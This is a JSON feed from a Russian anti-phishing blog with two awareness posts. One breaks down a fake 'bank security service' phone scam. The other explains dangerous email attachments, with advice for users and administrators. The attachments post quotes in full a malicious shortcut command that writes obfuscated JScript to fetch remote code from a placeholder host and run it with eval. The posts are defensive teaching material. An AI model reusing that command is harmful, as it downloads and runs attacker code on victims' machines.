{
    "version": "https:\/\/jsonfeed.org\/version\/1",
    "title": "Блог Start X: заметки с тегом социальная инженерия",
    "_rss_description": "как поведение людей влияет на безопасность Наши продукты • Дайджесты • Статьи • Список постов",
    "_rss_language": "ru",
    "_itunes_email": "",
    "_itunes_categories_xml": "",
    "_itunes_image": "",
    "_itunes_explicit": "",
    "home_page_url": "https:\/\/blog.startx.team\/tags\/socialnaya-inzheneriya\/",
    "feed_url": "https:\/\/blog.startx.team\/tags\/socialnaya-inzheneriya\/json\/",
    "icon": "https:\/\/blog.startx.team\/user\/userpic@2x.jpg?1687861408",
    "author": {
        "name": "Start X",
        "url": "https:\/\/blog.startx.team\/",
        "avatar": "https:\/\/blog.startx.team\/user\/userpic@2x.jpg?1687861408"
    },
    "items": [
        {
            "id": "134",
            "url": "https:\/\/blog.startx.team\/all\/reveal-scam-caller\/",
            "title": "Антифишинг-разбор: звонок из «службы безопасности банка»",
            "content_html": "<p main>\r\n    <i>Мошенники придумывают всё новые способы обмануть людей. Вместе с психологом мы разбираем, почему эти способы бывают успешны и что делать, чтобы не стать жертвой.<\/i>\r\n<\/p>\n<p aside style=\"opacity: 1; text-align: center;\">\r\n    <img src=\"\/pictures\/andrey2.jpg\" width=\"40%\" \/> <br \/>\r\n    <a href=\"mailto:digest@antiphish.ru\">Андрей Жаркевич<\/a><br \/> редактор<br \/><br \/>\r\n<img src=\"https:\/\/blog.antiphish.ru\/pictures\/olga.jpg\" width=\"40%\"\/> <br \/>\r\n<a href=\"mailto:psy@antiphish.ru\">Ольга Лимонова<\/a><br \/>психолог<br \/><br \/>\r\n<\/p>\n<p>Один из массовых и популярных в последнее время способов — звонок из «службы безопасности банка».<\/p>\n<h2>Пример №1<\/h2>\n<p>Вариант такой атаки — с подделкой исходящего номера, когда у жертвы на телефоне высвечивается настоящий номер банка:<\/p>\n<p><img src=\"https:\/\/blog.antiphish.ru\/pictures\/IMG_0463-2.jpeg\" width=\"60%\"><\/p>\n<p>Послушайте, как разговаривают мошенники:<\/p>\n<div class=\"e2-text-audio\">\n<div class=\"e2-text-super-wrapper e2-jouele-wrapper\"><a class=\"jouele\" data-space-control=\"true\" data-length=\"368\" href=\"https:\/\/blog.startx.team\/audio\/audio_2019-08-scammers.mp3\">Разговор с мошенником<\/a><\/div>\n<\/div>\n<h2>Пример №2<\/h2>\n<p>Таким же способом пытались обмануть Андрея Золотова, который не только не поддался на обман, но и рассказал эту историю на своей странице а соцсети.<\/p>\n<!-- ((https:\/\/www.facebook.com\/story.php?story_fbid=10217129344538484&id=1615504620 --><p>рассказал эту историю на своей Facebook-странице)):<\/p>\n<!--\r\n<iframe src=\"https:\/\/www.facebook.com\/plugins\/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fandrew.zolotov%2Fposts%2F10217129344538484&width=500\" width=\"500\" height=\"546\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowTransparency=\"true\" allow=\"encrypted-media\"><\/iframe>\r\n--><h2>Разбор<\/h2>\n<p>Мы разобрали атаку мошенников по стадиям воздействия <a href=\"https:\/\/www.antiphish.ru\/stages\">в соответствии с психологической моделью<\/a>, которая разработана и используется специалистами Антифишинга:<\/p>\n<div class=\"e2-text-picture\">\n<img src=\"https:\/\/blog.startx.team\/pictures\/af-attack-stages.png\" width=\"857\" height=\"380\" alt=\"\" \/>\n<\/div>\n<p>Ниже — детальные результаты:<\/p>\n<h2>1. Внешний вид<\/h2>\n<ul>\n<li>Узнаваемый авторитетный бренд, правдоподобное оформление: Номер телефона мошенников маскируется под настоящий. Во втором эпизоде у жертвы он был сохранен в записной книжке как «Поддержка ВТБ». Представляются службой безопасности банка. Используют классические шаблонные фразы сотрудников банка.<\/li>\n<li><b>Личное обращение: Персональное<\/b> — «Золотов Андрей Васильевич», знают дату рождения.<\/li>\n<li><b>Атрибуция: Личная<\/b> — Жертва является клиентом банка.<\/li>\n<\/ul>\n<h2>2. Эмоциональное воздействие<\/h2>\n<p>Вызываемые эмоции:<\/p>\n<ul>\n<li><b>Страх<\/b>: «Вы сейчас переводили 42 тысячи Кузнецовой Марии в Самарскую область?», «Вам нужно заблокировать и перевыпустить все карты, сменить компьютер. В личный кабинет сейчас не заходите, доступ к нему мы тоже заблокировали в целях безопасности»,<\/li>\n<li><b>Радость\/Благодарность<\/b>: «Так как платеж был помечен, как сомнительный, он заморожен».<\/li>\n<\/ul>\n<p>Усилители:<\/p>\n<ul>\n<li><b>Авторитет<\/b>: звонок от службы безопасности крупного банка<\/li>\n<li><b>Срочность<\/b> — платеж заморожен только на 10 минут.<\/li>\n<li><b>Ситуация-катастрофа<\/b>: «Злоумышленники получили доступ к вашему интернет-банку и сейчас пытаются оттуда вывести деньги!»<\/li>\n<\/ul>\n<h2>3. Личностные черты и опыт пользователя<\/h2>\n<ul>\n<li><b>Личностные черты<\/b>: Нельзя определить точно. Можно лишь отметить, что бдительность автора была усыплена? и он был достаточно доброжелателен в беседе, лишь под конец проявив подозрительность. Следование исключительно собственным правилам, вне зависимости от ситуации.<\/li>\n<li><b>Актуальная потребность: Безопасность<\/b>. Ею пытаются манипулировать сначала со стороны заботы (наиболее оптимальная тактика), затем используя уговаривание, а далее и вовсе угрозы.<\/li>\n<li><b>Демографические характеристики: Взрослый мужчина, программист<\/b> — не лучшая аудитория среди жертв.<\/li>\n<li><b>Опыт столкновения с цифровыми атаками<\/b>: Технически подкован и знаком с основами информационной безопасности<\/li>\n<\/ul>\n<h2>4. Активация внимания и мышления<\/h2>\n<ul>\n<li><b>Генерализация гипотезы<\/b>: Возможно это мошенники?<\/li>\n<li><b>Проверка гипотезы<\/b>: Для этого стоит перезвонить в банк самому, прежде чем куда либо вводить код<\/li>\n<li><b>Оценка рисков<\/b>: Перезвонить — затрата меньше чем в одну минуту. Передача данных мошенникам — потери в денежном эквиваленте.<\/li>\n<li><b>Глобальная оценка<\/b>: Не стоит вестись на угрозы и срочность, лучше самому перезвонить в банк.<\/li>\n<\/ul>\n<h2>5. Реакция<\/h2>\n<ul>\n<li>Звонок на официальный номер банка с уточнением ситуации<\/li>\n<li>Зафиксировали, с какого ip действовал мошенник, и составили заявку в службу безопасности банка<\/li>\n<\/ul>\n<h2>Чем хороши мошенники?<\/h2>\n<ul>\n<li>Первичная манипуляция действиями: «проверьте свои карты — все ли они на месте». Если человек выполнил действие по указке раз, то шанс, что выполнит повторно, повышается.<\/li>\n<li>Выстраивание отношения\/транзакции «Родитель» (управляющий мошенник) — «Ребенок» (подчиняющаяся, следующая указам жертва).<\/li>\n<li>Маскировка под официальный телефонный номер<\/li>\n<li>Использование классических шаблонных фраз сотрудников банка<\/li>\n<li>Ввод кода в тоновом режиме, а не голосом оператору. Это вызывает меньше подозрений, поскольку практически не используется.<\/li>\n<\/ul>\n<h2>Чем выдали себя мошенники?<\/h2>\n<ul>\n<li><b>Срочность<\/b><\/li>\n<li><b>Техническая неграмотность<\/b>. Устрашение «покупкой нового компьютера» — это ориентировано на пенсионеров, которые слабо ориентируются в технической среде и действительно готовы поверить и испугаться денежных затрат.<\/li>\n<li><b>Путаница в словах<\/b><\/li>\n<li><b>Эмоциональная реакция<\/b> самого мошенника, проступающая на вербальном уровне<\/li>\n<\/ul>\n<div style=\"margin-top: 2em; padding: 2em; background-color: cornsilk; width: 80%; margin-bottom: 1em;\" class=\"wrapper\"><div class=\"castom-wrapper\"><div class=\"castom-img\"><p><a href=\"https:\/\/www.antiphish.ru\/\"><br \/>\n<img src=\"https:\/\/blog.antiphish.ru\/pictures\/af-logo-blue-200.png\" class=\"ico-antph\"><br \/>\n<\/a><\/p>\n<\/div><div class=\"castom-text\"><p><b>О компании «<a href=\"https:\/\/www.antiphish.ru\/\">Антифишинг<\/a>»<\/b><br \/>\n<br>Наша платформа помогает обучить сотрудников, измерять и тренировать их навыки с помощью имитированных атак. Ведём исследования, используем собственную методологию, создаем реалистичные сценарии и актуальные примеры мошенничества для тренировки навыков.<\/p>\n<p>\r\n      Заполните <a href=\"https:\/\/www.antiphish.ru\/\">форму на сайте<\/a> или <a href=\"mailto:ask@antiphish.ru\">напишите нам<\/a>, чтобы обучить и проверить своих сотрудников.<\/p>\n<\/div><\/div><\/div><link href=\"\/\/cdn-images.mailchimp.com\/embedcode\/classic-10_7.css\" rel=\"stylesheet\" type=\"text\/css\">\r\n<div style=\"padding: 2em; border: 2px solid #1996D4; width: 80%;\" class=\"wrapper\">\r\n  <b>\r\n    <a href=\"tg:\/\/resolve\/?domain=antph\">Телеграм-канал Антифишинга<\/a>\r\n    <br>\r\n  <\/b>\r\n  <div class=\"castom-wrapper\">\r\n    <div class=\"castom-img\">\r\n      <a href=\"tg:\/\/resolve\/?domain=antph\">\r\n        <img src=\"https:\/\/blog.antiphish.ru\/pictures\/iconfinder_social-56_1591869.png\" style=\"max-width: 100%;\">\r\n      <\/a>\r\n    <\/div>\r\n    <div class=\"castom-text\">\r\n      <span>Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.<\/span>\r\n      <br><br>\r\n      <span>Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.\r\n      <\/span>\r\n    <\/div>\r\n  <\/div>\r\n<\/div>\r\n<br>\r\n<div style=\"padding: 2em; border: 2px solid #4CAF50; width: 80%;\" class=\"wrapper\">\r\n  <b>Оставайтесь в безопасности<\/b>\r\n  <p>Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.<\/p>\n<div id=\"mc_embed_signup\"><p><form action=\"https:\/\/antiphish.us12.list-manage.com\/subscribe\/post?u=5bc2379b1c3f318ccd3523105&amp;id=9663ee2d1b\" method=\"post\" id=\"mc-embedded-subscribe-form\" name=\"mc-embedded-subscribe-form\" class=\"validate\" target=\"_blank\" novalidate=\"\" style=\"padding: 0px;\"><\/p>\n<div id=\"mc_embed_signup_scroll\"><div class=\"mc-field-group\"><p><label for=\"mce-EMAIL\">Эл. почта: <\/label><br \/>\n<input type=\"email\" value=\"\" name=\"EMAIL\" class=\"required email\" id=\"mce-EMAIL\"><\/p>\n<\/div><div id=\"mce-responses\" class=\"clear\"><div class=\"response\" id=\"mce-error-response\" style=\"display:none\"><\/div><div class=\"response\" id=\"mce-success-response\" style=\"display:none\"><\/div><\/div><!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups--><div style=\"position: absolute; left: -5000px;\" aria-hidden=\"true\"><p><input type=\"text\" name=\"b_5bc2379b1c3f318ccd3523105_9663ee2d1b\" tabindex=\"-1\" value=\"\"><\/p>\n<\/div><div class=\"clear\"><p><input type=\"submit\" value=\"Подписаться\" name=\"subscribe\" id=\"mc-embedded-subscribe\" class=\"button\"><\/p>\n<\/div><\/div><p><\/p>\n<p><\/form><\/p>\n<\/div><\/div><p><br \/><\/p>\n<script type=\"text\/javascript\" src=\"https:\/\/vk.com\/js\/api\/openapi.js?162\"><\/script>\n<!-- VK Widget --><div id=\"vk_groups\" class=\"vk_groups\" style=\"overflow:hidden\"><\/div><script type=\"text\/javascript\">\r\n  VK.Widgets.Group(\"vk_groups\", { mode: 1, width: \"400\", overflow: \"hidden\" }, 185030667);\r\n<\/script>\n",
            "date_published": "2019-08-06T23:30:30+03:00",
            "date_modified": "2022-03-23T19:37:22+03:00",
            "image": "https:\/\/blog.startx.team\/pictures\/af-attack-stages.png",
            "_date_published_rfc2822": "Tue, 06 Aug 2019 23:30:30 +0300",
            "_rss_guid_is_permalink": "false",
            "_rss_guid": "134",
            "_e2_data": {
                "is_favourite": false,
                "links_required": [
                    "system\/library\/jquery\/jquery.js",
                    "system\/library\/jouele\/jouele.css",
                    "system\/library\/jouele\/jouele.js"
                ],
                "og_images": [
                    "https:\/\/blog.startx.team\/pictures\/af-attack-stages.png"
                ]
            }
        },
        {
            "id": "3",
            "url": "https:\/\/blog.startx.team\/all\/malware-attached\/",
            "title": "Опасные вложения",
            "content_html": "<p main>\r\n<i>Опытные пользователи знают, что через почту им могут прислать вирус или троянскую программу. Мошенники, в свою очередь, стараются сделать так, чтобы вредоносные вложения выглядели как можно более безобидно.<\/i>\r\n<br><br>\r\nВ статье мы покажем примеры опасных вложений и объясним, на что стоит обращать внимание, чтобы не стать жертвой. Статья будет полезна пользователям и системным администраторам. <\/p>\n<p aside style=\"opacity: 1; text-align: center;\">\r\n<img src=\"\/pictures\/svoldokhin_new.jpg\" width=\"40%\"\/> <br \/>\r\nСергей Волдохин <br \/>\r\n<a href=\"mailto:sv@antiphish.ru\">sv@antiphish.ru<\/a>\r\n<\/p>\n<h2>«Традиционный» вредоносный файл<\/h2>\n<p>Вирус или троянскую программу пользователи обычно представляют как исполняемый файл с расширением .ехе под Виндовс или .dmg под Мак.<\/p>\n<p>Такая вредоносная программа, приложенная к письму, может не определяться антивирусом, но почти все почтовые серверы умеют фильтровать подобные вложения: письмо с .ехе-файлом просто не будет отправлено. Чтобы обойти это ограничение, мошенникам бывает достаточно упаковать исполняемый файл в архив:<br \/><br \/>\n<img src=\"\/pictures\/wurde.JPG\" \/><br \/><br \/>\n<img src=\"\/pictures\/jack-exe.PNG\" \/><br \/><\/p>\n<p><b>Что делать пользователю:<\/b> получив любое вложение в архиве, распакуйте его в отдельную папку и проверьте тип вложенного файла. Не открывайте файлы типа <i>Приложение<\/i>, даже если ваш антивирус не против.<\/p>\n<p><b>Администратору.<\/b> Постарайтесь ограничить прием почты с исполняемыми файлами, даже если они упакованы в архив. При настройке ограничений стоит ориентироваться на <a href=\"https:\/\/en.wikipedia.org\/wiki\/Portable_Executable\">формат файла<\/a>, а не его расширение.<\/p>\n<h2>Вредоносный скрипт<\/h2>\n<p>Кроме традиционных программ, операционная система Виндоус умеет выполнять так называемые скрипты — программы, написанные на специальном языке программирования, например JScript или WBScript.<\/p>\n<p>У таких языков есть ряд ограничений, но написанная на них вредоносная программа вполне способна зашифровать все файлы на диске или скачать полноценного троянца.<\/p>\n<p>О существовании скриптов знает еще меньше пользователей, а мошенники стараются скрыть настоящий тип файла: например, через длинное или вызывающее доверие название:<br \/>\n<img src=\"\/pictures\/meeting-wsf.PNG\" \/><br \/><br \/>\n<img src=\"\/pictures\/scan-js.PNG\" \/><br \/><br \/>\n<img src=\"\/pictures\/sct.PNG\" \/><br \/>\n<i><a href=\"https:\/\/twitter.com\/subtee\/status\/771356649449586690\">Источник<\/a><\/i><\/p>\n<p><b>Пользователю:<\/b> Не открывайте файл, тип которого содержит слова «скрипт», «сценарий» или что-то непонятное. И даже если ваш антивирус не имеет ничего против.<\/p>\n<p><b>Администратору:<\/b> постарайтесь заблокировать исполнение скриптов, или хотя бы переопределить их обработчики. Файл .js, для которого обработчиком назначен notepad.exe — неплохая помощь антивирусу и защита для невнимательных пользователей.<\/p>\n<h2>Офисный документ<\/h2>\n<p>Пользователям бывает сложно поверить, но файлы Ворд или Эксель тоже могут быть вредоносными. Наиболее популярная схема — вредоносная программа запускается через макрос, который пользователю предлагается разрешить к выполнению под разумным предлогом. Например, если содержимое документа некорректно отображается:<\/p>\n<p><img src=\"\/pictures\/locky-macros-6401.png\" \/><br \/>\n<i><a href=\"https:\/\/www.anti-malware.ru\/news\/2016-02-25\/18144\">Источник<\/a><\/i><\/p>\n<p><b>Пользователю:<\/b> не разрешайте выполнение макросов в документах, которые вам присылают по электронной почте. Особенно если не знаете отправителя и не уверены в содержании макроса.<\/p>\n<p><b>Администратору:<\/b> по возможности отключите исполнение макросов на компьютерах пользователей. Те, кому это действительно необходимо для работы, дадут вам знать.  Вовремя обновляйте все офисные программы — кроме макросов, вредоносная программа может выполниться через эксплойт к одной из многих <a href=\"https:\/\/www.cvedetails.com\/vulnerability-list\/vendor_id-26\/product_id-320\/Microsoft-Office.html\">публичных RCE-уязвимостей<\/a>.<\/p>\n<h2>Опасный ярлык<\/h2>\n<p>Иногда во вложении вовсе может не быть вредоносной программы. Вместо нее мошенники присылают ярлык, перейдя по которому пользователь сам загрузит и запустит вредоносную программу:<\/p>\n<p><img src=\"\/pictures\/schet.PNG\" \/><br \/><br \/>\n<img src=\"\/pictures\/attached.PNG\" width=\"100%\" \/><br \/><br \/>\n<img src=\"\/pictures\/link-properties.PNG\" \/><br \/><\/p>\n<p>В свойствах этого ярлыка прописана команда, которая загрузит и запустит вредоносный .js-скрипт из интернета. Все, что нужно для загрузки и запуска, уже содержится в операционной системе.<\/p>\n<p><b>Пользователю:<\/b> ярлыки, которым вы можете доверять, находятся на вашем рабочем столе. Не стоит запускать файл с типом <i>Ярлык<\/i>, который вам прислали по электронной почте. Даже если его название вызывает доверие.<\/p>\n<p><b>Администратору:<\/b> постарайтесь заблокировать исполнение любого командного интрпретатора под учетной записью пользователя. По возможности переопределите его имя и путь — вредоносным программам будет сложнее сориентироваться. Обратите внимание на полное содержимое вредоносного ярлыка:<\/p>\n<pre class=\"e2-text-code\"><code class=\"\">%windir%\\system32\\cmd.exe \/c REM.&gt;3.txt&amp;echo var ty= new ActiveXObject(&quot;Msxml2.ServerXMLHTTP.6.0&quot;);ty[&quot;\\x6F\\x70\\x65\\x6E&quot;](&quot;\\x47\\x45\\x54&quot;,&quot;http:\/\/&lt;url&gt;.com\/src\/gate.php?a&quot;);ty[&quot;\\x73\\x65\\x6E\\x64&quot;]();eval(ty[&quot;responseText&quot;]);&gt;3.txt&amp;ren 3.txt 3.js&amp;3.js<\/code><\/pre><h2>Вредоносная ссылка<\/h2>\n<p>Иногда мошенники не рискуют высылать вложенный файл, а вместо этого добавляют в письмо вредоносную ссылку. Благодаря оформлению, такая ссылка выглядит похожей на «безопасный» вложенный файл:<\/p>\n<p><img alt=\"\" src=\"\/pictures\/zakaz.PNG\" style=\"border: 1px solid gray;\" \/><\/p>\n<p><img alt=\"\" src=\"\/pictures\/url.png\" \/><\/p>\n<p>Обе ссылки около «заявки» ведут на вредоносный файл.<\/p>\n<p><b>Пользователю:<\/b> умейте отличать вложенный файл от ссылки, которая ведет на внешний сайт. Наведите курсор и посмотрите, куда на самом деле ведет «ссылка на документ».<\/p>\n<p><b>Администратору:<\/b> постарайтесь ограничить загрузку исполняемых файлов на прокси-сервере. Аналогично вложениям, ориентируйтесь на тип файла, а не расширение.<\/p>\n<h2>Выводы<\/h2>\n<ol start=\"1\">\n<li>Мошенники используют самые разные форматы вредоносных вложений.<\/li>\n<li>Не открывайте никакие вложения и не переходите по ссылкам, в которых не уверены.<\/li>\n<li>По возможности ограничьте запуск скриптов, командных интерпретаторов и загрузку небезопасных типов файлов.<\/li>\n<li>Обучайте своих пользователей основам информационной безопасности. Для начала можно переслать ссылку на эту статью.<\/li>\n<li>Тренируйте и контролируйте практические навыки противодействия фишингу.<\/li>\n<\/ol>\n<div style=\"padding: 1em; background-color: cornsilk; width: 80%; margin-bottom: 1em;\"><p><b>О компании «Антифишинг»<\/b><\/p>\n<p>Мы помогаем обучить сотрудников и контролируем их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и актуальные примеры мошеннических писем — в том числе те, которые описаны в статье.<\/p>\n<p>Чтобы проверить своих пользователей, отправьте запрос через <a href=\"http:\/\/www.antiphish.ru\">наш сайт<\/a> или напишите нам: <a href=\"mailto:ask@antiphish.ru\">ask@antiphish.ru<\/a><\/p>\n<\/div>",
            "date_published": "2016-09-12T01:57:03+03:00",
            "date_modified": "2020-10-26T17:01:29+03:00",
            "_date_published_rfc2822": "Mon, 12 Sep 2016 01:57:03 +0300",
            "_rss_guid_is_permalink": "false",
            "_rss_guid": "3",
            "_e2_data": {
                "is_favourite": false,
                "links_required": [
                    "system\/library\/highlight\/highlight.js",
                    "system\/library\/highlight\/highlight.css"
                ],
                "og_images": []
            }
        }
    ],
    "_e2_version": 3820,
    "_e2_ua_string": "E2 (v3820; Aegea)"
}